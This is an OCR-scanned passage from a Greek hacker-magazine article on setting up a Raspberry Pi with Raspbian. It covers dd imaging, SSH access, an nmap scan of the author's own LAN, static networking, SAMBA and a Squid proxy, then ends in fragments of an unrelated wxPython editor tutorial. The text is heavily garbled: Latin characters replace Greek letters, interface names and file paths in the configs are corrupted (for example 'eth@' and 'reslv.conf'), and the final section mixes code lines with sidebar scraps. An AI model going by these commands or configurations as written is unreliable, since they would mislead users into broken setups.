Ano Ta images που διανέμονται στο επἰσιµο site Tou Raspberry εμεὶς 
επιλέξαμε To Raspbian Wheezy, To οποίο εἶναι µια προσαρμοσμένη στην 
αρχιτεκτονικἠ του Raspberry Pi εκδοχἠ του δοκιµασμµένου και στεθερὀ- 
τατου Debian Linux. Αφού κατεβάσαµε To image (µέσω BitTorrent), ano 
το τερματικὀ ενὸς Ubuntu box To αποσυµπιἐσαµε πληκτρολογώντας 


sub@@precise:~$ unzip 2012-09-18-wheezy-raspbian.zip 


Meta βάλαμε µια καρτούλα SD σε µια κατάλληλη θύρα του υπολογιστή 
και Φροντίσαµε να μάθουμε To device file που της αντιστοιχούσε: 


sub@@precise:~$ df -h 


Filesystem Size Used Avail Use% Mounted on 
/dev/sdb6 23G 5.9G 16G 28% / 

udev 3.9G 4.0K 3.9G 1% /dev 

tmpfs 1.6G 888K 1.6G 1% /run 

none 5.0M © 5.0M 0% /run/lock 

none 3.9G 76K 3.9G 1% /run/shm 
/dev/sdb7 277G 140G 123G 54% /home 

/dev/sdc1 3.7G 32K 3.7G 1% /media/SD 
//192.168.1.95/terra 2.ΘΤ 1.5T 553G 73% /samba/rambaldi/ 
terra 


Στο παρἀδειγμὰ µας, το ζητούμενο device file εἶναι To /dev/sdc. Πριν την 
εγγραφή του image, To filesystem της κάρτας εἶναι καλό να αποπροσαρ- 
τηθεἰ: 

sub@@precise:~$ sudo umount /dev/sdc1 

sub@@precise:~$ df -h 


Filesystem Size Used Avail Use% Mounted on 
/dev/sdb6 23G 5.9G 16G 28% / 

udev 3.9G 4.0K 3.9G 1% /dev 

tmpfs 1.6G 888K 1.6G 1% /run 

none 5.0M @ 5.0M 0% /run/lock 
none 3.9G 76K 3.9G 1% /run/shm 
/dev/sdb7 277G 140G 123G 54% /home 


//192.168.1.95/terra 2.0T 1.5T 553G 73% /samba/rambaldi/terra 
H εγγραφἠ του image yivetal πληκτρολογώντας κάτι σαν 
$ sudo dd bs=4M if=~/2012-09-18-wheezy-raspbian.img of=/dev/sdc 
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46241 records in 

462+1 records out 

1939865600 bytes (1.9 GB) copied, 275.078 s, 7.1 MB/s 
Τρομερὴ προσοχἠ χρειάζεται εδώ, ὥστε να µη δοθεἰ στην παράμετρο «of» 
λάθος device file! Σε µια τέτοια περίπτωση εἶναι πιθανὀ va αχρηστευτεὶ 
κάποιο filesystem που δεν πρέπει, ὁπως, N.X., αυτό ενὸς ἄλλου διαμερἰ- 
σµατος ἡ εκεἰνο and την εγκατάσταση άλλου λειτουργικού συστήματος. 


Αναλόγως της ταχύτητας της κάρτας SD, η διαδικασία εγγραφἠς του 
image εἶναι πιθανὀ να διαρκέσει αρκετά λεπτά. 


Πρώτη επαφή, πρώτες ρυθμίσεις 


Κατὰ την πρώτη εκκἰνηση του Raspberry Pi το εἰχαμε συνδεδεμένο σε Tn- 
λεόραση, μέσω καλωδίου HDMI. Τον χειρισμὀ τον κάναμε ano Eva aoup- 
µατο πληκτρολόγιο της Microsoft, µε το αντίστοιχο USB receiver πάνω 
στο Pi. 


Σημειώστε ESM ὁτι TO Raspberry Pi δεν ἐχει κάποιον διακόπτη on/off. 
Απλά, µε την SD κουμπωμένη πάνω του το βάζουμε στην τροφοδοσία για 
να ξεκινήσει, ενώ για va το κλείσουμε απλά βγάζουμε το τροφοδοτικὀ 
ano την πρἰζα. 


Στο Raspbian υπάρχει Non δημιουργημένος ἑνας χρήστης, µε username 
το pi Kal password To raspberry. Ο χρήστης αυτὸς εἶναι σε θέση να εκτε- 
Agi το sudo και συνεπώς να κάνει ὁποια δουλειὰ απαιτεἰ δικαιώματα υπερ- 
χρήστη (root). Καλὸ εἶναι να αλλάξουμε το password του ὁσο πιο γρήγο- 
ρα γίνεται, δίνοντας 


pi@raspberrypi ~ $ passwd 

Changing password for pi. 

(current) UNIX password: (δεν εμφανίζεται) 
Enter new UNIX password: (δεν εμφανίζεται) 
Retype new UNIX password: (δεν εμφανίζεται) 
passwd: password updated successfully 


Για ορισμένες βασικἐς ρυθμίσεις του λειτουργικού, παρέχεται TO εὐχρη- 
στο εργαλείο raspi-config: 


pi@raspberrypi ~ $ sudo raspi-config 


Οι πρὠτες δουλειές που κάναμε εμεὶς, ἦταν va θἐσουµε τη σωστἠ ζώνη 
ώρας (change_timezone) και μετὰ να μεγενθύνουμε τη ριζικἠ κατάτμηση 
(root filesystem) του λειτουργικού συστήµατος, ὥστε να εκτείνεται σε 
όλον το διαθέσιμο χώρο της κάρτας SD (expand_rootfs). fia να εφαρµο- 
στεἰ η συγκεκριμένη αλλαγή πρέπει να προηγηθεἰ επανεκκίνηση Tou Pi, 
gite μέσα ano To raspi-config εἶτε ano τη γραμμὴ εντολών: 


pi@raspberrypi ~ $ sudo reboot 


O κύριος λὀγος nou αρχικἁ βάλαμε To Raspberry Pi σε τηλεόραση, ἠταν 
για να βεβαιωθούμε OT! υπάρχει SSH server και εἶναι ενεργοποιημένος. 
Σκοπεύαμε βλέπετε να συνεχίσουμε τις δοκιμές μπροστὰ ano GAAov uno- 
λογιστἠ κι έχοντας συνδεθεί στο Pi μέσω SSH, π.χ., µε τη βοήθεια του 
PuTTY των Windows ἡ του τυπικού SSH client ονόματι ssh (όλα πεζὰ), που 
βρίσκουμε στο Linux, στο OS X και npakTikd σε κάθε ἄλλο ὈΝΙΧοειδὲς 
λειτουργικὀ. Μέσα ano το raspi-config παρέχεται η επιλογἠ για την ενερ- 
yonoinon/anevepyonoinon του SSH server, ο οποίος, ὁπως διαπιστώσα- 
με, εἶναι εξ ορισμού ενεργοποιημένος! 
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Ἐτσι, αν εἶστε σαν εμάς κι ἐχετε NON προμηθευτεί Eva model B αλλά 
δεν βιάζεστε να τρέξετε κἄποιο desktop περιβάλλον ἡ να στήσετε media 
center για το σαλὀνι, µην μπείτε καν στον κὀπο να βάλετε το Raspberry 
σε τηλεόραση ἡ σε monitor. Απλά, συνδέστε το µε ἑνα καλώδιο Ethernet 
στο τοπικό δίκτυο, εισάγετε την καρτούλα SD µε το λειτουργικὀ, βάλτετο 
τροφοδοτικὀ στην πρἰζα και μετά ano λίγο συνδεθείτε µέσω SSH. Mpo- 
κειμένου να βρείτε το IP που θα ἐχει πάρει απὸ τον τοπικὀὸ DHCP server 
(πιθανώς ano εκείνον του modem/router), µια ιδέα εἶναι να κοιτάξετε τον 
σχετικὀ πίνακα αναθέσεων του router. Μια ακόµη καλύτερη --ἡ τουλἀχι- 
στον πιο cool-- ιδέα, εἶναι να σκανάρετε To LAN µε Eva εργαλείο σαν το 
nmap. Δείτε ἑνα παράδειγµα ano το δικὀ µας δίκτυο: 


imac24:~ cvar$ sudo nmap -Ρθ 192.168.1.0/24 


Nmap scan report for raspberrypi.home (192.168.1.101) 
Host is up (@.0@096s latency). 

Not shown: 999 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

MAC Address: B8:27:EB:B6:5A:46 (Raspberry Pi Foundation) 


Ουσιαστικἀ, αυτό NOU ψάχνετε εἶναι µια συσκευή µε κάρτα Ethernet nou 
φέρει το διακριτικὀ «Raspberry Pi Foundation». Ὅπως @aivetal στο na- 
ράδειγµα, το Raspbian του δικού µας Raspberry εἶχε πάρει τη διεύθυνση 
192.168.1.101. Τώρα, αν σκοπεύετε να χειρίζεστε To Raspberry κυρίως 
δικτυακά, πριν οτιδήποτε ἀλλο εἰναι καλή ιδέα να του δώσετε στατικἠ 
διεύθυνση IP. Προς τούτο, αρκεἰ να τροποποιήσετε κατάλληλα το αρχείο 
/etc/network/interfaces µε κἄποιον text editor, σαν To vi ἡ το nano. Acsi- 
τε το δικὀ µας και TPONOINOTE το δικὀ σας αναλόγως (το device nou µας 
ενδιαφἑρει εἶναι το εἴπ): 
pi@raspberrypi ~ $ cat /etc/network/interfaces 
auto lo 
iface lo inet loopback 
#iface eth@ inet dhcp 
auto ethe 
iface eth@ inet static 
address 192.168.1.98 
gateway 192.168.1.1 
netmask 255.255.255.0 
network 192.168.1.0 
broadcast 192.168.1.255 
allow-hotplug wlan@ 
iface wlan@ inet manual 
wpa-roam /etc/wpa_supplicant/wpa_supplicant. conf 
iface default inet dhcp 
Δεν πρέπει να αμελήσουμε και To αρχείο /etc/reslv.conf, στο οποίο opio- 
νται Οἱ domain name servers. Παράδειγμα: 
pi@raspberrypi ~ $ cat /etc/resolv.conf 
domain home 
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search home 


nameserver 192.168.1.1 


Προκειμένου va ληφθούν υπόψη οι αλλαγές, κάντε µια γρήγορη επανεκ- 
κίνηση µε 


pi@raspberrypi ~ $ sudo reboot 


Ano Aoyapiaopous χρηστών σε ἄλλους υπολογιστὲς που χρησιμοποιείτε 
εσεἰς και κανένας ἄλλος, εἶναι KGAN ιδέα να αντιγράψετε το αντίστοιχο 
SSH public key στο Raspbian, ὥστε να συνδέεστε στη συσκευἠ χωρίς να 
πληκτρολογεἰτε το password του χρήστη pi (ἡ ὀποιουδήποτε ἄλλου έχετε 
δημιουργήσει και χρησιμοποιείτε, τέλος πάντων). Ma παράδειγμα, ano 
vav iMac εμεἰς συνδεόµαστε απευθείας στο Raspberry, πληκτρολογώ- 
ντας στο Terminal 


imac24:~ cvar$ ssh pi@raspberry 


(To «raspberry» το έχουμε βάλει στο /etc/hosts, MOTE va µη γράφουμε 
Kav To IP της συσκευής.) Εἰχαμε βεβαίως φροντίσει va αντιγράψουµε το 
αρχείο ~/.ssh/id_rsa.pub στο λογαριασμό του χρήστη pi... 


imac24:~ cvar$ scp ~/.ssh/id_rsa.pub pi@raspberry:~/ 


...Kal απὀ τον λογαριασμὀ Tou pi να προσθέσουμε To id_rsa.pub στο ap- 
χείο ~/.ssh/authorized_keys: 


pi@raspberrypi ~ $ cat id_rsa.pub >> ~/.ssh/authorized_keys 


(Αν στο λογαριασμὀ του χρήστη σας δεν υπάρχει To αρχείο ~/.id_rsa.pub, 
δημιουργήστε τώρα Eva ζεύγος ιδιωτικού-δημοσίου κλειδιού γράφοντας 
ssh-keygen o’ ἑνα τερματικὀ.) 


Κάτι ἆλλο που κάναμε πριν περάσουμε σε πιο σοβαρὰ παιχνίδια µε το 
Raspberry, ἦταν va αναβαθµἰσουµε λειτουργικὀ κι εφαρμογές. Όπως σε 
κάθε Debian-based διανομή, ETO! και στην περίπτωση του Raspbian õi- 
νουµε πρῶτα Eva 


pi@raspberrypi ~ $ sudo apt-get update 
AUTO γίνεται προκειµένου να ενημερώσουμε την τοπικἠ λίστα πακέτων µε 
τις πλέον πρόσφατες εκδόσεις όλων των διαθέσιμων προγραμμάτων, βι- 


βλιοθηκών και αρχείων συστήµατος. Ακολούθως εφαρμὀζουμε τις ὁποιες 
διαθέσιμες ενημερώσεις, γράφοντας 


Όταν λέμε OT! TO 
Raspberry Pi δεν 
έχει κουδουνάκια 
και σφυρίχτρες, TO 
εννοούμε! Ακόμα 
και την θήκη του 
πρέπει να την 
προμηθευτείτε 
ξεχωριστά. H εικο- 
νιζόμενη εἶναι απο 
το modmypi.com. 


28 


VHAQKER 


ÁN 


pi@raspberrypi ~ $ sudo apt-get dist-upgrade 


Ας δούµε τώρα μερικὰ πιο ενδιαφέροντα πράγματα που μπορούμε va Kå- 
VOUHE, µε το ολοκαϊνουργιὀ µας Raspberry Pi! 


Μερικὲς ιδέες για την αξιοποίηση του Pi 


Κατ' αρχάς, το yeyovoc OT! μιλάμε για Eva πλἠρες υπολογιστικὀ σύστημα 
ικανό να τρέχει σύγχρονα λειτουργικά, σημαίνει ὁτι μπορούμε να Kå- 
νουµε σχεδὸν τα πάντα μ' αυτό. Υπάρχουν βέβαια οι περιορισμοἰ της 
ισχύος και των δυνατοτήτων επέκτασης του hardware, μολαταύτα όμως 
το Raspberry Pi εξακολουθεὶ να εἶναι µια ικανότατη πλατφόρμα. Ava- 
λογιστείτε τώρα το μικρὸ, βολικὀ του μέγεθος, την εξαιρετικἀ χαμηλἠ 
κατανάλωση και το ὁτι εἶναι εντελώς αθὀρυβο, οπότε ξαφνικἁ συνειδητο- 
ποιεἰτε πως για πολύ κόσμο To Raspberry εἶναι ὁ,τι για χρόνια ζητούσαν 
-- αλλά δεν το ἑβρισκαν. 


Αναφέρουµε μερικὲς απὀτις εφαρμογές που ἐρχονται στο μυαλὸ µας, Xw- 
pic συγκεκριμένη σειρά: SAMBA fileserver, OpenVPN server, BitTorrent 
downloader, proxy server, Tor exit node, DNS server, media center (µε 
To XBMC), game console (µε το MAME), penetration testing platform 
κ.λπ. κ.λπ. 


Αν τα προηγούμενα δεν σας xouv ανοίξει την ὀρεξη, ειλικρινά δεν Eż- 
poupe τι GAAO θα μπορούσε να το πετύχει. Στη συνέχεια παρουσιάζουμε 
τρεις μόνο απὀτις εφαρμογές που προλάβαμε να δοκιμάσουμε, στο χρόνο 
που εἶχαμε απὀ τη στιγμή που καταπιαστήκαμε µε TO Raspberry Pi ἑως kal 
τη συγγραφή του παρὀντος. Διαβάστε και το συμπληρωματικὀ ἆρθρο στο 
http://deltahacker. gr/?p=6632 για περισσότερες χρήσεις που σκεφτήκαμε 
για το Raspberry Pi. Ποιος ξέρει µε τι ἄλλο θα έχουμε καταπιαστεἰ, τη 
στιγμὴ που θα διαβάζετε αυτὲς τις γραμμές... 


OpenVPN για To οικιακὀ δίκτυο 


Όπως ἐχουμε εξηγἠσει και στο σχετικὀ άρθρο του deltaHacker 007 
(σελ. 012), στήνοντας τον δικὀ µας OpenVPN server στο σπίτι αποκτάµε 
ασφαλέστατη πρὀσβαση στο οικιακὀ τοπικὀ δίκτυο απ’ ὀπου κι av βρι- 
σκόμαστε, ὁπως κι αν συνδεόµαστε στο Internet, ανεξαρτήτως av το 
σηµείο πρόσβασης παρέχει κάποιου εἰδους ασφάλεια ἡ ὀχι. Σκεφτείτε 
Tov OpenVPN server ως µια ασφαλἠ πύλη προς όλα τα μηχανήματα του 
σπιτιού, φυσικά και προς ὀλες τις παρεχόμενες υπηρεσίες EVTOG του ÕI- 
κτύου. Εἶναι, δηλαδὴ, σαν να βρισκόμαστε µε το laptop µας στο Ρέικιαβικ 
ἡ στο Ανατολικὀ Τιμόρ και ξαφνικἁ να βρισκόμαστε εντὸς του γραφείου 
μας, στην Καλαμαριά (οι τοποθεσίες εἶναι εντελὠς τυχαίες). ‘Eva ἐξτρα 
μπόνους που κερδίζουμε µε TO OpenVPN, εἰναι OT! ακόµη και η ἴδια η 
nepinynon µας στο web εἶναι δυνατὸν να γἰνεται µέσω του ασφαλούς, 
κρυπτογραφημένου καναλιού που ξεκινά ano το laptop και φτάνει ως TOV 
server, στο σπίτι. 


Το άρθρο για το OpenVPN που φιλοξενούμε στο τεύχος 012 αφορά στο 
Ubuntu Server, ωστόσο Χακριβώςγ ἴδια εἶναι και τα βήματα nou χρειάζε- 
ται ν΄ ακολουθήσουμε στο Raspbian. 


Fileserver µε τη SAMBA 


Πριν γίνει το Raspberry fileserver, πρέπει να φροντίσουμε για τον ano- 
θηκευτικὸ χώρο. Ὅσο μεγάλη και να εἶναι η κάρτα SD, προφανώς και δεν 
επαρκεί. Το ἴδιο ισχύει και για Ta USB sticks. Πρέπει, λοιπόν, να συνδὲ- 
σουµε στο Raspberry ¿vav εξωτερικὀ σκληρὸ δίσκο μέσω USB, ο οποίος 
όμως θα πρέπει va EXE! δικἠ του τροφοδοσἱα -- ἡ να εἶναι πάνω σε Eva 
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powered USB hub. 


Στο τομέα του software, αυτὀ που χρειαζόμαστε εἶναι η SAMBA. Ἐτσι, 
πρόσβαση στα αρχεἰα του fileserver θα έχουμε απὀ οποιονδήποτε ἄλλον 
υπολογιστή, ανεξαρτήτως αν τρέχει Windows, OS X, Linux ἡ *BSD. H 
εγκατάσταση της SAMBA στο Raspbian εἶναι τόσο απλἠ Ooo Eva 


pi@raspberrypi ~ $ sudo apt-get install samba 


H ρύθμιση yiveTal τροποποιώντας το αρχείο /etc/samba/smb.conf. Εμείς 
εἰχαμε Eva ἐτοιμο ano ἑναν ἄλλον fileserver, που τρέχει FreeBSD και ως 
σύστημα αχείων ἐχει το ZFS (άσχετη µε το θέμα µας αυτή η τελευταία 
πληροφορία, δεν χορταΐνουμε ὁμως va το λέμε). Δείτε το, ὥστε να τρο- 
ποποιήσετε καταλλήλως το smb.conf της δικἠής σας SAMBA: 
#========== Global Settings ========== 
[global] 
workgroup = PARABING 
server string = SAMBA Server @ RaspberryPi 
security = user 
log file = /var/log/samba/log.%m 
max log size = 50 
passdb backend = tdbsam 
wins support = no 
#========== Share Definitions. ========== 
[homes] 
comment = Home Directories 
browseable = no 
writable = yes 


‘ETo! ὁπως εἶναι ρυθµισµένη n SAMBA, κάθε χρήστης Tou Raspbian ἐχει 
πρὀσβαση στον προσωπικὀ του κατάλογο, αρκεἰ να δώσει το σωστό 
username και password. Φυσικά, πρόσβαση ἐχει Kal σε ἄλλους κατα- 
λόγους, αρκεὶ να ει τα κατάλληλα δικαιώματα ano πλευράς Linux. Να 
σημειώσουμε εδὠ ὁτι οι χρήστες του Raspbian που θέλουμε να ἐχουν 
πρὀσβαση µέσω SAMBA, πρέπει να εἶναι γνωστοί στην τελευταία. AUTO 
επιτυγχάνεται εὐκολα, µε τη βοήθεια του εργαλείου pdbedit. Δείτε, π.χ., 
πώς προσθέτουμε τον χρήστη pi στη SAMBA: 


pi@raspberrypi - $ sudo pdbedit -a -u pi 
new password: 

retype new password: 

Unix username: pi 


NT username: 


Account Flags: [υ ] 

User SID: S-1-5-21-3008316254-1057876083-149270187- 
1001 

Primary Group SID: S-1-5-21-3008316254-1057876083-149270187- 
513 

Full Name: 

Home Directory: \\raspberrypi\pi 


HomeDir Drive: 
Logon Script: 
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Profile Path: \\raspberrypi\pi\profile 
Domain: RASPBERRYPI 

Account desc: 

Workstations: 

Munged dial: 


Logon time: θ 

Logoff time: never 

Kickoff time: never 

Password last set: Wed, 10 Oct 2012 17:34:26 EEST 


Password can change: Wed, 10 Oct 2012 17:34:26 EEST 
Password must change: never 


Last bad password ΗΠ] 
Bad password count : @ 
Logon hours : ΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕΕ 


Παρατηρήστε oti ζητείται password για To νέο χρήστη, µε username 
To pi. Δεν χρειάζεται να εἶναι idio µε εκεϊνο του ομώνυμου χρήστη του 
Raspbian. Όπως και να χει, ὀποτε προσπαθούμε να συνδεθούμε στη 
SAMBA του Raspberry ano κάποιον ἀλλον υπολογιστή και µας ζητείται 
password για τον pi, τότε οφείλουμε να πληκτρολογήσουμε εκείνο που 
δώσαμε στο pdbedit. 


Αφού τελειώσουμε µε TO smb.conf και τους χρήστες της SAMBA, επανεκ- 
KIVOUHE τον Server πληκτρολογώντας 


pi@raspberrypi ~ $ sudo service samba restart 


Web proxy µε To Squid 


την ιδέα την έριξε ο φίλος @Kouklossss, ano το Twitter. (Μη γελάτε: 
Αυτὸ εἶναι To handle του και δεν ἐχουμε κανέναν λὀγο να αμφιβάλλουμε 
για την εμφάνισή του.) Πα την ακρίβεια, µας ζήτησε Evav οδηγό για το 
στήσιμο του διακομιστή διαµεσολάβησης web ονόματι Squid, τον οποίο 
θα χρησιμοποιούν οι web browsers ano διάφορα μηχανήματα του το- 
πικού δικτύου. Σκεφτήκαμε, λοιπὀν, να εγκαταστήσουµε το Squid στο 
ολοκαίνουργιο Raspberry και κατόπιν να το ρυθµίσουµε για το τοπικὀ µας 
δίκτυο. Έτσι σκεφτήἠκαμε, ETO! πράξαμε: 
pi@raspberrypi ~ $ sudo apt-get install squid 

To va και µοναδικὀ αρχείο ρυθµἰσεων του Squid που πρέπει va τροποποι- 
ηθεἰ, εἶναι το /etc/squid/squid.conf. Αν το ανοίξετε θα δείτε ότι εἶναι ap- 
κετὰ εκτενές. Ευτυχώς, οι παρεμβάσεις/τροποποιἠσεις που απαιτούνται 
προκειµένου O proxy να λειτουργεἰ σωστά εντὸς του τοπικού µας δικτύ- 
ου, εἶναι λίγες. Αρκετά επεξηγηµατικἁ και βοηθητικἁ εἰναι και τα σχόλια 
εντὸς του squid.conf, τουλάχιστον για εκείνους που ἐχουν το κουράγιο 
να τα διαβάσουν. Παραθέτουµε τις αλλαγές που κάναμε εμεἰς. Με βάση 
αυτές, κάντε τις δικὲς σας τροποποιήσεις στο squid.conf, λαμβάνοντας 
υπόψη το δικὀ σας τοπικὀ δίκτυο. 


# ACCESS CONTROLS 

acl all src all 

acl manager proto cache_object 

acl localhost src 127.0.0.1/32 

acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 
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acl localnet src 192.168.0.0/16 ἡ RFC1918 possible internal 
network 


http_access allow localnet 

http_access allow localhost 

# DISK CACHE OPTIONS 
cache_replacement_policy heap LFUDA 
cache_dir ufs /var/spool/squid 512 16 256 


Αφού γίνουν οι αλλαγές στο squid.conf, ο server πρέπει va επανεκκινἠ- 
σει: 


pi@raspberrypi ~ $ sudo service squid restart 


Ano εκεἰ και πέρα, κάθε web browser που θέλουμε να χρησιμοποιεὶ To 
Squid, εννοείται πως πρέπει να εἶναι ενήμερος για την παρουσία Tou. Πα 
το δικὀ µας setup, η διεύθυνση του proxy εἶναι η 192.168.1.98 και To port 
παραμένει το προκαθορισμένο, δηλαδή To 3128. ‘Eva εξαιρετικἁ βολικὀ 
add-on για τον Firefox, το οποίο μεταξὺ ἄλλων µας επιτρέπει να επιλὲ- 
YOUHE εύκολα proxy, εἶναι το λεγόμενο FoxyProxy (http://getfoxyproxy. 
org). Σας το προτείνουμε. 


Εντυπώσεις και σχέδια για TH συνέχεια 


Σε YEVIKEG γραμμές, χρησιμοποιώντας κάποιος το Raspberry Pi ως ἑνα 
headless box, πλην ελαχίστων εξαιρέσεων ξεχνά ὁτι αλληλεπιδρά µε 
ἑναν υπολογιστή κλάσης Pentium II. 


O επεξεργαστἠς γραφικὼν του Raspberry Pi δεν έχει τη δικἠ του, au- 
τὀνομη μνήμη, οπότε δεσμεύει μέρος της κεντρικής RAM. Εργοστασια- 
kad καταλαμβάνει 64MB και αυτή η ποσότητα εἰναι σίγουρα μεγάλη, αν 
δεν σκοπεύετε να σηκώσετε περιβάλλον γραφικὠν ἡ να αναπαράγετε 
βίντεο. Ευτυχώς, μέσα ano το raspi-config και συγκεκριµένα την ΕΠΙλο- 
yn memory_split, μπορούμε να ορίσουμε εμεὶς την ποσότητα της RAM 
που θα δεσμεύεται απὸ τη GPU. Στα πλαίσια των δικῶν µας δοκιμών TÅG 
δώσαμε 16MB, που εἶναι η ελάχιστη επιτρεπτή ποσότητα -- τουλάχιστον 
μέσω του raspi-config. Το αποτέλεσμα ἠταν OT! κερδίσαμε 48 ολόκληρα 
ΜΒ για το λειτουργικὀ σύστημα, ποσότητα µη αμελητέα για Evav υπολο- 
γιστἠ µε 256MB συνολικἠ μνήμη. 


Παραμένοντας στο raspi-config, βλέπουμε ὁτι παρέχονται επιλογές για 
overclocking και overvolting του επεξεργαστή. Εμεἰς πήγαμε ως την npo- 
ρύθμιση ονόματι Medium (200MHz και 2volt παραπάνω). Δυστυχώς, εκεὶ 
αρχίσαμε va ἐχουμε κάποια τυχαία κρεμµάσματα του συστήµατος. Μετά 
απὀ μερικὲς δοκιμές γυρἰσαμε στην προρύθµιση None, που σημαίνει ὁτι 
δεν γἱνεται οὐτε overclocking, οὐτε overvolting. Αναλόγως βέβαια του 
board, εἶναι πιθανὸν το σύστημα να δουλεύει σταθερἁ ακόμα και µε την 
προρύθμιση Turbo, που σημαίνει ὁτι ο επεξεργαστἠς θα χρονἰζεται στα 
1000MHz (16Η7), µε τάση ρεύματος 6volt πάνω ano την κανονικἠ. 


Για τη συνέχεια των δικὠν µας ενασχολήσεων µε TO Raspberry Pi, σκο- 
πεύουμε να στήσουµε Eva media center για το σαλόνι. Θα χρησιµοποιή- 
σουµε επἰσης το Pi κι ως πλατφόρμα penetration testing. Τις περιγραφές 
των εγχειρηµάτων και φυσικὰ τις εντυπώσεις µας, θα τις ἐχετε σε επὀ- 
μενα τεύχη. Μέχρι τότε, καλἠ διασκέδαση µε το Pi σας -- ἡ ἑστω KAGAN 
αναμονὴ για εκείνο που παραγγεἰλατε! 
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self.Seticon(self.icon) λας 
self.InitEditor() 


MW def InitEditor(self): 
self.InitStatusBar() 
self.InitMenuBar{) 
self.textctrl = wx. TextCtri(self, style=wx.TE_MULTILINE) 
self.textctri.SetFocus() 


Τ, 
ΕΟΝΤΕΑΜΙΙΥ ΡΕΡΑυΙ- Στο ἂρθρο που δημοσιεύεται 


Font(pointSize=12, family=wx 
textfont = wx.Fon (po HT_NORMAL) στο deltaHacker 012 
και αφορά στη σχεδίαση 


tyle=wx.FONTSTYLE_NORMAT. weight=wx.FONTWEIG 
self. textctrl.SetFont(textt ont) ΞῬαρμογὠν για το περιβάλλ 
γραφικών, πήραμε μόνο Ὃν 


self Show(True) a ‘ ae 
- uon ano τ 
ο PE HE TNV πον 
N EnitéAou 
| ae ὩλΛαχτηκαµμε ano τι j 
- PETES εφαρμογἑ ο) 
μπα ae YEG κονσόλας! 
λεν ψέμματα: Αν δεν εἶναι 
Lae τότε εἶναι (;) 
νο γι Ἶ 
προγραμματισμού, ορ 
Ὅλον 5 OHWG ἔχουμε νέα και i 
fe a σχέδια. Ano εδώ και 
Άμος 2 γράφουμε τα πάντα 
abl εριβάλλον γραφικών 
τ r παράθυρα, εικονίδια. 
πο widgets, θα εἶναι στο 
ea NHEPIVO µας πρὀγραμ 
ο η τα προγράμματά 
ΠΕ ene πραγµατικἁ Š 
a XI ἄλλες µετατροπέ 
ος OU σε Φαρενάιτ! Ὄχι ᾿ 
αξινομήσεις Φυσαλίδας! 


f InitStatusBar(self)- 
Oe eer = self.createStatusBa i 
Statusbar.SetStatusText( Re 
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Ano την ἄλλη, βἐβαια, τα ενδιαφἐροντα προγράµµατα παρουσιάζουν και 
ενδιαφέρουσες, εχμ, δυσκολἰες. Ποιο εἶναι ἄραγε To killer πρόγραµµα 
που μπορούμε να γράψουμε, ξεκινώντας µε την wxPython; Θα πρέπει να 
εἶναι αρκετά σύνθετο για να ἐχει λόγο ύπαρξης — και κάποια χρησιµότη- 
τα. Ταυτόχρονα, καλό εἶναι η ανἀπτυξή του να ξεκινά αρκετά απλά, WOTE 
καθώς εξοικειωνόµαστε µε το wxPython να μπορούμε να προσθέτουμε 
δυνατότητες σταδιακά. 


Αν θυμάστε ano τη σειρἁ µας στο PyGame (ξεκίνησε στο deltaHacker 
005), το ὀνειρο των παλιῶν bedroom programmers των 805 ἦταν να 
γράψουν va παιχνίδι τύπου shoot ‘em up. AUTO το καταφέραμε μετὰ 
ano μερικὰ ἆρθρα κι αντίστοιχα ξενύχτια, ακριβώς ὁπως τότε! Ποιο va 
εἶναι ἀραγε το αντίστοιχο πρὀγραµµα για τους developers των "σοβαρών 
εφαρμογών”; 


Εὐκολο: Σκεφτείτε ποιο εἶναι το πρὀγραμμα που βλέπει και χρησιμοποιεί 
ἑνας προγραμματιστής κάθε” μέρα. Μην neite ο compiler ἡ ο interpreter 
της γλὠσσας προγραμματισμού. Φυσικά, χωρὶς τη γλὠσσα δεν γίνεται 
τίποτα. Την περισσότερη WPA, όμως, την περνάμε μπροστὰ ano Eva ou- 
ντάκτη κειµένου ἡ απλά editor. 


Editors, υπάρχουν πολλοι: 
ο To απλὀ IDLE της Python 


e Μεγάλων δυνατοτήτων και πολυπλοκότητας, όπως οι vim και 
emacs (αμφότεροι κυκλοφορούν για περιβάλλον κονσόλας αλλά 
και γραφικών) 


ο Ὑλοποιήσεις που ἐρχονται µε το περιβάλλον γραφικών, ὁπως το 
mousepad στο XFCE, το gedit στο Gnome, To Kate στο KDE και 
πάει λέγοντας 


ο To Notepad ota Windows, το οποίο αποτελεἰ δείγμα editor σε δεἰγ- 
μα λειτουργικού (κρύψτε τα και τα δύο, να µην Ta βλέπω |) 


ο Αυτός που θα φτιάξουμε εμείς, ξεκινώντας απὀ αυτό το τεύχος! 


Θα φτιάξουμε δικὸ µας editor; Και βέβαια. Πα την ακρίβεια, ἑναν editor 
σε Python και wxPython. Μάλιστα, μόλις προχωρήσει λίγο, θα μπορούμε 
να τον χρησιμοποιήσουμε για να γράφουµετον ...εαυτὸ του. Φανταστείτε 
να κάνετε edit To source code Tou editor, μέσα στον ἰδιο Tov editor. Ναι, 
εἶναι χελώνες μέχρι κάτω. Τελικά, κάτι ἦξερε ο κύριος αρχισυντάκτης! 
(http://deltahacker. gr/?p=4862). 


Στην απλοὐστερή του µορφή, ἑνας editor γράφεται σε λίγες γραμμές και 
μπορούμε να τον επεκτείνουµε καθώς μαθαίνουμε OAO και περισσότερο 
wxPython. Μπορεί να µην το κάνουμε gvim, αλλά oiyoupa θα εἶναι πολύ 
καλύτερος ano το Notepad και πολύ πιο εμφανίσιμος ano το IDLE. Ας µην 
καθυστερούμε, λοιπὸν. 


Τι ακριβὠς εἶναι ἑνας editor; 


Ελαφρά Φιλοσοφική η ερώτηση, αλλά στην απλούστερη του µορφή ¿vag 
συντάκτης κειμένου δεν εἶναι τίποτα περισσότερο ano Eva παράθυρο 
μέσα στο οποίο γράφουμε κείμενο. Αν μάλιστα έχετε τρέξει TO vi στην 
κονσόλα, ἴσως αρχικἁ NIOTEWETE ὁτι δεν κάνει απολύτως τίποτα ἄλλο (Οι 
περισσότεροι χρήστες δεν ξέρουν καν πως να βγουν ano εκεἰ μέσα — 
τόσο πολύ ταιριάζει στον ορισμό μας!) O δικός µας editor ωστόσο θα εἰναι 


Python ἃ wxPython: The wxEditor Project! 


ΑΙ 


B stagel.py (~/tutorials/wxpython/2/source) - GVIM 


File Edit Tools Syntax Buffers Window Help 


Ες δι ΠΠΙΒ 9 Φ| π ὃρ οἱ Εἰ 8 | δ 


Emport wX 
wxEditor 


Ctri+N 
